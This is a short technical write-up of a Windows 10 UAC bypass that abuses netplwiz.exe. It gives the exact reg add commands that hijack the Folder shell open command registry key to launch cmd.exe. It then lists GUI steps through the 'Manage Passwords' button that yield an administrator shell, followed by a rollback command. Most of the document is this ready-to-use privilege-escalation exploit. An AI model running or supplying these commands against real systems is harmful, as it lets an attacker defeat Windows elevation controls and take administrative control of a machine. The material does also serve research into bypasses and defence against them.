gui uac bypass (netplwiz.exe)
- Type: GUI Hack
- Method: Registry key manipulation
- Target: \system32\netplwiz.exe
- Component(s): Attacker defined
- Works from: window 10
HKCU\Software\Classes\Folder\shell\open\command
was called when click manage passwords button in netplwiz.exe
x
Produce steps:
- Run command
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f
- run netplwiz.exe in cmd .
- Select the "Advanced" tab, and click the "Manage Passwords" button.
- then you will get Administrator Shell.
Rollback command :
reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f